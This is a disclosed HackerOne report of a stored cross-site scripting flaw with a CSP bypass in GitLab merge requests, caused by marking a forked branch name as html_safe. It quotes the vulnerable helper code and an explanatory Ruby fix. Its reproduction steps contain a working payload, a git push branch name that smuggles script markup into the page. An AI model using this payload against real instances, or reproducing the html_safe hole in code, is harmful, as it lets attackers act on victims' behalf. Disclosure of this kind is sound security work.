Stored-XSS with CSP-bypass in Merge requests
HackerOne report #1965750 by yvvdwf
on 2023-04-28, assigned to @rshambhuni:
Report
Hi,

GitLab recently added an icon to indicate a fork in the Merge requests page. This modification indicates `source_branch` as `html_safe`, which can cause XSS:
Source: https://gitlab.com/gitlab-org/gitlab/-/blob/f728534d7f6a357cf049cfd7a640a32504a1b9d6/app/helpers/merge_requests_helper.rb#L251

```ruby
branch_title = if merge_request.for_fork?
                 _('%{source_project_path}:%{source_branch}').html_safe % { source_project_path: merge_request.source_project_path.html_safe, source_branch: merge_request.source_branch.html_safe }
               else
                 merge_request.source_branch
               end
```
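The root cause, shown as an added illustration in plain Ruby (this is not code from the report or from GitLab): in Rails, `ActiveSupport::SafeBuffer#%` HTML-escapes each interpolated argument unless that argument is itself marked `html_safe`, so calling `html_safe` on the user-controlled branch name switches off the escaping the format string would otherwise have applied. Below, `CGI.escapeHTML` stands in for the Rails escaper, `unsafe_branch_title` mirrors the vulnerable composition and `safe_branch_title` the corrected one (escape the untrusted fragments, then compose); the project path and branch name are constructed sample values.

```ruby
require 'cgi'

# Constructed sample values, not taken from the report's project.
SAMPLE_PROJECT_PATH = 'user_b/b'
SAMPLE_BRANCH = 'x<script>y</script>'

# Mirrors the vulnerable pattern: every fragment is treated as trusted markup,
# so whatever the branch name contains is emitted into the page verbatim.
def unsafe_branch_title(project_path, branch)
  format('%<source_project_path>s:%<source_branch>s',
         source_project_path: project_path,
         source_branch: branch)
end

# Hardened form: the untrusted fragments are escaped before composition, so a
# branch name can only ever render as text. In Rails this is what SafeBuffer#%
# does on its own when the arguments are NOT pre-marked html_safe.
def safe_branch_title(project_path, branch)
  format('%<source_project_path>s:%<source_branch>s',
         source_project_path: CGI.escapeHTML(project_path),
         source_branch: CGI.escapeHTML(branch))
end

# Review-time check for a fragment that is supposed to be plain text:
# does anything that a browser would parse as a tag survive in it?
def contains_markup?(fragment)
  fragment.match?(%r{<[A-Za-z!/]})
end

if __FILE__ == $PROGRAM_NAME
  puts "unsafe: #{unsafe_branch_title(SAMPLE_PROJECT_PATH, SAMPLE_BRANCH)}"
  puts "safe:   #{safe_branch_title(SAMPLE_PROJECT_PATH, SAMPLE_BRANCH)}"
end
```

The practical reading for a reviewer: a value that originates outside the application (a Git ref name here) should reach a template unmarked, and only the static format string should ever carry `html_safe`.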
Reproduce

1. Within the current user, e.g., `user_a`, create a public project `user_a/a`.
2. Switch to another user, e.g., `user_b`:
   2.1. Fork https://gitlab.com/user_a/a to a public project `user_b/b`.
   2.2. Clone `user_b/b` to your local machine using ssh: `git clone git@gitlab.com:user_b/b`
   2.3. Push a new branch to `user_b/b`:

   ```
   git clone git@gitlab.com:user_b/b
   cd b
   git push origin HEAD:"XSS<i/class=hidden><form/class=gl-show-field-errors><input/title='<script>alert(document.domain)</script>'>"
   ```

   2.4. Back on the website gitlab.com, create a new merge request from the branch created above to `user_a/a`.
   2.5. After creating the merge request, you should see a popup that is created by `<script>alert(document.domain)</script>`.
3. The XSS should exist at: https://gitlab.com/user_a/a/-/merge_requests/1
4. Example: https://gitlab.com/yvvdwf/test-xss-in-merge-request-via-fork/-/merge_requests/1 (in private mode)
Impact
Stored-XSS with CSP-bypass allows attackers to execute arbitrary actions on behalf of victims at the client side.